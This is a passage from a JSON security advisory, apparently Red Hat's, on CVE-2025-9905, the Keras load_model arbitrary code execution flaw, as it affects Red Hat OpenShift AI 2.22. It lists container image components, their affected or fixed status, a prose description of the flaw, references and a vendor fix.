"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x"
},
"product_reference": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le"
},
"product_reference": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le"
},
"product_reference": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x"
},
"product_reference": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64"
},
"product_reference": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64 as a component of Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
},
"product_reference": "registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64",
"relates_to_product_reference": "Red Hat OpenShift AI 2.22"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-9905",
"cwe": {
"id": "CWE-913",
"name": "Improper Control of Dynamically-Managed Code Resources"
},
"discovery_date": "2025-09-19T09:00:54.801987+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2396645"
}
],
"notes": [
{
"category": "description",
"text": "The Keras Model.load_model\u00a0method can be exploited to achieve arbitrary code execution, even with safe_mode=True.\n\nOne can create a specially crafted .h5/.hdf5\u00a0model archive that, when loaded via Model.load_model, will trigger arbitrary code to be executed.\n\nThis is achieved by crafting a special .h5\u00a0archive file that uses the Lambda\u00a0layer feature of keras which allows arbitrary Python code in the form of pickled code. The vulnerability comes from the fact that the safe_mode=True\u00a0option is not honored when reading .h5\u00a0archives.\n\nNote that the .h5/.hdf5\u00a0format is a legacy format supported by Keras 3 for backwards compatibility.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "keras: Arbitary Code execution in Keras load_model()",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64"
],
"known_not_affected": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-9905"
},
{
"category": "external",
"summary": "RHBZ#2396645",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2396645"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-9905",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9905"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-9905",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-9905"
},
{
"category": "external",
"summary": "https://github.com/keras-team/keras/pull/21602",
"url": "https://github.com/keras-team/keras/pull/21602"
},
{
"category": "external",
"summary": "https://github.com/keras-team/keras/security/advisories/GHSA-36rr-ww3j-vrjv",
"url": "https://github.com/keras-team/keras/security/advisories/GHSA-36rr-ww3j-vrjv"
}
],
"release_date": "2025-09-19T08:16:44.772000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-04T13:06:08+00:00",
"details": "For Red Hat OpenShift AI 2.22.3 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_ai/",
"product_ids": [
